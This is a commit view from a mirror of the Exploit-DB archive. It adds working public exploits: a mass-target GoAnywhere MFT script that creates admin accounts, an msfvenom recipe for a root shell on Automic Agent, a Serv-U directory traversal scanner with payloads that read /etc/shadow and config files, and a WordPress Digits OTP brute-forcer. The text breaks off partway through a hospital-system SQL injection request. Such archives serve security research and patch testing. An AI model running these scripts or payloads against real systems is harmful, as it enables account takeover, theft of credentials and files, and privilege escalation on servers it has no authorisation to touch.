bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-05-30

Browse source 
7 changes to exploits/shellcodes/ghdb

Automic Agent 24.3.0 HF4 - Privilege Escalation

Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass

SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal

Campcodes Online Hospital Management System 1.0 - SQL Injection

WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing

Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
This commit is contained in:
Exploit-DB 2025-05-30 00:16:26 +00:00
parent d69eaacef8
commit c3b152279e
7 changed files with 996 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

338
exploits/multiple/remote/52308.py Executable file
View file

@ -0,0 +1,338 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
# Date: 2025-05-25
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft
# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial
# Version: < 7.4.1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-0204
# Description:
# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability
# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal
# vulnerability to access the initial account setup wizard. This exploit demonstrates two different
# path traversal techniques to maximize successful exploitation across various server configurations.
#
# References:
# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/
# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability
# - https://nvd.nist.gov/vuln/detail/cve-2024-0204
import argparse
import concurrent.futures
import os
import socket
import sys
from typing import List, Dict, Tuple, Optional, Union
import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
# Initialize colorama for cross-platform colored output
init(autoreset=True)
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Constants
DEFAULT_TIMEOUT = 10
MAX_THREADS = 10
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml"
class Banner:
@staticmethod
def show():
banner = f"""{Fore.CYAN}
{Style.RESET_ALL}
{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL}
"""
print(banner)
class GoAnywhereExploit:
def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT):
self.username = username
self.password = password
self.timeout = timeout
self.headers = {"User-Agent": USER_AGENT}
self.vulnerable_targets = []
self.non_vulnerable_targets = []
self.error_targets = []
def check_target(self, target: str) -> Dict:
"""
Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account
Args:
target: The target URL/domain to check
Returns:
Dict containing result information
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
# Try primary exploit path first
primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH)
if primary_result["vulnerable"]:
return primary_result
# If primary path failed, try secondary exploit path
print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...")
secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH)
if secondary_result["vulnerable"]:
return secondary_result
# If both paths failed, target is not vulnerable
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204")
result["message"] = "Not vulnerable to CVE-2024-0204"
self.non_vulnerable_targets.append(target)
return result
def _try_exploit_path(self, target: str, exploit_path: str) -> Dict:
"""
Try to exploit the target using a specific exploit path
Args:
target: Target to exploit
exploit_path: Path to use for exploitation
Returns:
Dict with exploitation results
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
try:
url = f"https://{target}{exploit_path}"
session = requests.Session()
# Initial check for vulnerability
response = session.get(
url,
headers=self.headers,
verify=False,
timeout=self.timeout
)
# Determine if target is vulnerable based on response
if response.status_code == 401:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)")
result["message"] = "Not vulnerable (401 Unauthorized)"
return result
if response.status_code != 200:
print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})")
result["message"] = f"Unexpected response (Status: {response.status_code})"
return result
# Target is potentially vulnerable
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!")
result["vulnerable"] = True
self.vulnerable_targets.append(target)
# Extract ViewState token for the form submission
try:
soup = BeautifulSoup(response.text, "html.parser")
view_state = soup.find('input', {'name': 'javax.faces.ViewState'})
if not view_state or not view_state.get('value'):
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}")
result["message"] = "Could not extract ViewState token"
return result
# Prepare data for admin account creation
data = {
"j_id_u:creteAdminGrid:username": self.username,
"j_id_u:creteAdminGrid:password_hinput": self.password,
"j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:confirmPassword_hinput": self.password,
"j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": 1,
"javax.faces.ViewState": view_state['value']
}
# Attempt to create admin account
create_response = session.post(
url,
headers=self.headers,
data=data,
verify=False,
timeout=self.timeout
)
if create_response.status_code == 200:
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}")
result["admin_created"] = True
result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}"
else:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})")
result["message"] = f"Failed to create admin account (Status: {create_response.status_code})"
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}")
result["message"] = f"Error extracting form data: {str(e)}"
result["error"] = str(e)
except requests.exceptions.ConnectTimeout:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout")
result["message"] = "Connection timeout"
result["error"] = "Connection timeout"
self.error_targets.append(target)
except requests.exceptions.ConnectionError:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error")
result["message"] = "Connection error"
result["error"] = "Connection error"
self.error_targets.append(target)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}")
result["message"] = f"Error: {str(e)}"
result["error"] = str(e)
self.error_targets.append(target)
return result
def scan_targets(self, targets: List[str]) -> None:
"""
Scan multiple targets concurrently
Args:
targets: List of targets to scan
"""
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
executor.map(self.check_target, targets)
def load_targets_from_file(self, file_path: str) -> List[str]:
"""
Load targets from a file
Args:
file_path: Path to the file containing targets
Returns:
List of targets
"""
if not os.path.exists(file_path):
print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}")
return []
try:
with open(file_path, "r") as f:
return [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}")
return []
def print_summary(self) -> None:
"""Print a summary of the scanning results"""
print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:")
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}")
print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}")
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}")
if self.vulnerable_targets:
print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:")
for target in self.vulnerable_targets:
print(f" - {target}")
def validate_args(args):
"""Validate command line arguments"""
if not args.target and not args.file:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)")
return False
if args.file and not os.path.exists(args.file):
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}")
return False
if not args.username or not args.password:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)")
return False
return True
def main():
"""Main function"""
parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit")
parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')")
parser.add_argument('-f', '--file', help="File containing targets, one per line")
parser.add_argument('-u', '--username', help="Username for the admin account to create")
parser.add_argument('-p', '--password', help="Password for the admin account to create")
parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})")
args = parser.parse_args()
# Show banner
Banner.show()
# Validate arguments
if not validate_args(args):
parser.print_help()
sys.exit(1)
# Initialize exploit
exploit = GoAnywhereExploit(
username=args.username,
password=args.password,
timeout=args.timeout
)
# Handle single target
if args.target:
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}")
exploit.check_target(args.target)
# Handle targets from file
elif args.file:
targets = exploit.load_targets_from_file(args.file)
if not targets:
print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file")
sys.exit(1)
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file")
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n")
exploit.scan_targets(targets)
# Print summary
exploit.print_summary()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user")
sys.exit(0)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}")
sys.exit(1)

13
exploits/multiple/remote/52309.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")

408
exploits/multiple/remote/52311.py Executable file
View file

@ -0,0 +1,408 @@
# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
# Date: 2025-05-28
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server
# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration
# Version: <= 15.4.2 HF1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-28995
# Description:
# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow
# attackers to read sensitive files on the host machine. This exploit demonstrates multiple
# path traversal techniques to access Serv-U log files and other system files on both
# Windows and Linux systems.
#
# References:
# - https://nvd.nist.gov/vuln/detail/cve-2024-28995
# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/
# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html
# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import os
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
import requests
from colorama import Fore, Back, Style, init
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
pass
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
BANNER = rf'''
{Fore.CYAN}
______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/
{Fore.YELLOW}
SolarWinds Serv-U Directory Traversal Exploit
{Fore.RED} CVE-2024-28995 by @ibrahimsql
{Style.RESET_ALL}
'''
class ScanResult:
def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):
self.url = url
self.is_vulnerable = is_vulnerable
self.version = version
self.os_type = os_type
self.file_content = file_content
self.path = path
self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
def to_dict(self):
return {
"url": self.url,
"is_vulnerable": self.is_vulnerable,
"version": self.version,
"os_type": self.os_type,
"path": self.path,
"timestamp": self.timestamp
}
def print_banner():
print(BANNER)
def normalize_url(url):
"""Normalize URL to ensure it has http/https protocol."""
if not url.startswith('http'):
url = f"https://{url}"
return url.rstrip('/')
def extract_server_version(headers):
"""Extract Serv-U version from server headers if available."""
if 'Server' in headers:
server_header = headers['Server']
# Look for Serv-U version pattern
match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header)
if match:
return match.group(1)
return None
def is_vulnerable_version(version):
"""Check if the detected version is vulnerable (15.4.2 HF1 or lower)."""
if not version:
return None
try:
# Split version numbers
major, minor, patch = map(int, version.split('.'))
# Vulnerable if lower than 15.4.2 HF2
if major < 15:
return True
elif major == 15:
if minor < 4:
return True
elif minor == 4:
if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable
return True
except:
pass
return False
def get_request(url, timeout=15):
"""Make a GET request to the specified URL."""
try:
response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)
return response
except requests.RequestException as e:
return None
def detect_os_type(content):
"""Detect the operating system type from the file content."""
if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]):
return "Linux"
elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]):
return "Windows"
return None
def get_default_payloads():
"""Return a list of directory traversal payloads specific to CVE-2024-28995."""
return [
# Windows payloads - Serv-U specific files
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"},
{"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"},
{"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"},
{"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"},
# Verify Windows with various system files
{"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"},
{"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"},
{"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"},
{"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"},
{"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"},
# Verify Linux with various system files
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"},
{"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"},
{"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"},
{"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"}
]
def create_custom_payload(directory, filename):
"""Create a custom payload with the specified directory and filename."""
# Try both encoding styles
payloads = [
{"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"},
{"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"},
{"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"}
]
return payloads
def load_wordlist(wordlist_path):
"""Load custom paths from a wordlist file."""
payloads = []
try:
with open(wordlist_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
# Check if the line contains a directory and file separated by a delimiter
if ':' in line:
directory, filename = line.split(':', 1)
payloads.extend(create_custom_payload(directory, filename))
else:
# Assume it's a complete path
payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."})
return payloads
except Exception as e:
print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}")
return []
def scan_target(url, custom_payloads=None):
"""Scan a target URL for the CVE-2024-28995 vulnerability."""
url = normalize_url(url)
result = ScanResult(url)
# Try to get server version first
try:
response = get_request(url)
if response and response.headers:
result.version = extract_server_version(response.headers)
vulnerable_version = is_vulnerable_version(result.version)
if vulnerable_version is False:
print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}")
# Still continue scanning as version detection may not be reliable
except Exception as e:
pass
# Get all payloads to try
payloads = get_default_payloads()
if custom_payloads:
payloads.extend(custom_payloads)
# Try each payload
for payload in payloads:
full_url = f"{url}{payload['path']}"
try:
print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}")
response = get_request(full_url)
if response and response.status_code == 200:
content = response.text
# Check if the response contains meaningful content
if len(content) > 100: # Arbitrary threshold to filter out error pages
os_type = detect_os_type(content)
if os_type:
result.is_vulnerable = True
result.os_type = os_type
result.file_content = content
result.path = payload['path']
print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}")
# Successful match - no need to try more payloads
return result
except Exception as e:
continue
if not result.is_vulnerable:
print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}")
return result
def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None):
"""Scan multiple targets using thread pool."""
results = []
custom_payloads = []
# Add custom payloads if specified
if custom_dir and custom_file:
custom_payloads.extend(create_custom_payload(custom_dir, custom_file))
# Add wordlist payloads if specified
if wordlist:
custom_payloads.extend(load_wordlist(wordlist))
print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}")
# Use fixed thread count of 10
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets}
for future in as_completed(future_to_url):
try:
result = future.result()
results.append(result)
except Exception as e:
print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}")
return results
def save_results(results, output_file):
"""Save scan results to a JSON file."""
output_data = [result.to_dict() for result in results]
try:
with open(output_file, 'w') as f:
json.dump(output_data, f, indent=2)
print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}")
def save_vulnerable_content(result, output_dir):
"""Save the vulnerable file content to a file."""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Create a safe filename from the URL
parsed_url = urlparse(result.url)
safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt"
output_path = os.path.join(output_dir, safe_filename)
try:
with open(output_path, 'w') as f:
f.write(f"URL: {result.url}\n")
f.write(f"Path: {result.path}\n")
f.write(f"Version: {result.version or 'Unknown'}\n")
f.write(f"OS Type: {result.os_type or 'Unknown'}\n")
f.write(f"Timestamp: {result.timestamp}\n")
f.write("\n--- File Content ---\n")
f.write(result.file_content)
print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-f", "--file", help="File containing a list of URLs to scan")
parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)")
parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)")
parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try")
parser.add_argument("-o", "--output", help="Output JSON file to save results")
args = parser.parse_args()
print_banner()
# Validate arguments
if not args.url and not args.file:
parser.print_help()
print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}")
sys.exit(1)
targets = []
# Get targets
if args.url:
targets.append(args.url)
if args.file:
try:
with open(args.file, "r") as f:
targets.extend([line.strip() for line in f.readlines() if line.strip()])
except Exception as e:
print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}")
sys.exit(1)
# Deduplicate targets
targets = list(set(targets))
if not targets:
print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}")
sys.exit(1)
print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}")
# Set output file
output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json"
# Start scanning
results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist)
# Process results
vulnerable_count = sum(1 for result in results if result.is_vulnerable)
print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}")
print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}")
print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}")
# Save results
save_results(results, output_file)
# Save vulnerable file contents
for result in results:
if result.is_vulnerable and result.file_content:
save_vulnerable_content(result, "vulnerable_files")
print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
sys.exit(0)
except Exception as e:
print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}")
sys.exit(1)

74
exploits/multiple/webapps/52307.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Google Dork: inurl:/wp-content/plugins/digits/
# Date: 2025-04-30
# Exploit Author: Saleh Tarawneh
# Vendor Homepage: https://digits.unitedover.com/
# Version: < 8.4.6.1
# CVE : CVE-2025-4094
"""
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
CWE-287: Improper Authentication
CVSS v3.1: 9.8 (Critical)
OWASP A2: Broken Authentication
[Instructions]
1. Use a tool like Burp Suite or your browsers developer tools to intercept the OTP verification request.
2. Copy the exact request parameters
3. Replace the placeholder values in the script with real data from the intercepted request.
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
[Alternative Method Burp Suite Pro]
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
1. Intercept the OTP request using Burp Proxy.
2. Send the request to Intruder.
3. Mark the `sms_otp` parameter as the payload position.
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
5. Start the attack and monitor responses for a different status code, length, or success message.
"""
import requests
def brute(otp):
url = "https://example.com/wp-admin/admin-ajax.php"
data = { # Replace with targets data
"login_digt_countrycode": "+",
"digits_phone": "000000000",
"action_type": "phone",
"sms_otp": otp,
"otp_step_1": "1",
"instance_id": "xxxxxxx",
"action": "digits_forms_ajax",
"type": "forgot",
"forgot_pass_method": "sms_otp",
"digits": "1",
"digits_redirect_page": "//example.com/",
"digits_form": "xxxxxxxx",
"_wp_http_referer": "/?login=true"
}
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://example.com/?login=true" # Replace with intercepted referer
}
response = requests.post(url, data=data, headers=headers)
if '"success":true' in response.text:
print(f"[+] OTP FOUND: {otp}")
exit()
def main():
for otp in range(0, 10000): # range(0, 1000000): for 6-digit
otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
print(f"[*] Trying OTP: {otp_str}")
brute(otp_str)
if __name__ == "__main__":
main()

72
exploits/multiple/webapps/52312.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: Carine Constantino
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Linux - Ubuntu Ubuntu 23.10
# CVE: CVE-2025-5298
# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
# The report in admin/betweendates-detailsreports.php does not validate fromdate and todate fields
# And allows the processing of SQL Injection queries of the types:
# blind time-based in the fromdate field
# boolean-based in the todate field
# Union Query in the todate field
fromdate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
